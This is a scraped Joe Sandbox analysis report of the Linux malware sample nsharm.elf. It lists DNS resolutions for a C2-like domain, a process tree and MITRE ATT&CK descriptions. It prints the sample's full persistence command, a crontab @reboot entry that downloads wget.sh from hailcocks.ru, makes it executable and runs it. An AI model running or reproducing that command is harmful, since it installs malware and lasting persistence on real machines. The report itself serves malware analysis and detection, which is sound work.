Oct 26, 2024 19:17:44.295861959 CEST	217.160.70.42	192.168.2.13	0x6b13	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:00.492328882 CEST	202.61.197.122	192.168.2.13	0x8ecc	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:06.895849943 CEST	185.181.61.24	192.168.2.13	0xb026	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:12.777451038 CEST	65.21.1.106	192.168.2.13	0xdb27	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:44.504378080 CEST	217.160.70.42	192.168.2.13	0x5681	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:50.254956961 CEST	80.152.203.134	192.168.2.13	0xb781	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:18:56.003783941 CEST	168.235.111.72	192.168.2.13	0xeedd	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	185.82.200.181	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	88.151.195.22	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	81.29.149.178	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	193.233.193.45	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	86.107.100.80	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	195.133.92.51	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	194.87.198.29	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	91.149.218.232	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	91.149.238.18	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	31.13.248.89	A (IP address)	IN (0x0001)	false
Oct 26, 2024 19:19:01.885994911 CEST	217.160.70.42	192.168.2.13	0x1fea	No error (0)	kingstonwikkerink.dyn	213.182.204.57	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: nsharm.elf PID: 5453, Parent PID: 5374

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/tmp/nsharm.elf
Arguments:	/tmp/nsharm.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: nsharm.elf PID: 5455, Parent PID: 5453

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/tmp/nsharm.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: sh PID: 5455, Parent PID: 5453

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5457, Parent PID: 5455

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5459, Parent PID: 5457

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5459, Parent PID: 5457

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5458, Parent PID: 5455

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5458, Parent PID: 5455

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: nsharm.elf PID: 5460, Parent PID: 5453

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/tmp/nsharm.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: nsharm.elf PID: 5504, Parent PID: 5460

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/tmp/nsharm.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: nsharm.elf PID: 5461, Parent PID: 5453

General

Start time (UTC):	17:16:57
Start date (UTC):	26/10/2024
Path:	/tmp/nsharm.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report nsharm.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.hvpvrW

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: nsharm.elf PID: 5453, Parent PID: 5374

General

Chronological Activities

Analysis Process: nsharm.elf PID: 5455, Parent PID: 5453

General

Chronological Activities

Analysis Process: sh PID: 5455, Parent PID: 5453

General

Chronological Activities

Analysis Process: sh PID: 5457, Parent PID: 5455

General

Chronological Activities

Analysis Process: sh PID: 5459, Parent PID: 5457

General

Chronological Activities

Analysis Process: crontab PID: 5459, Parent PID: 5457

General

Chronological Activities

Analysis Process: sh PID: 5458, Parent PID: 5455

General

Linux Analysis Report
nsharm.elf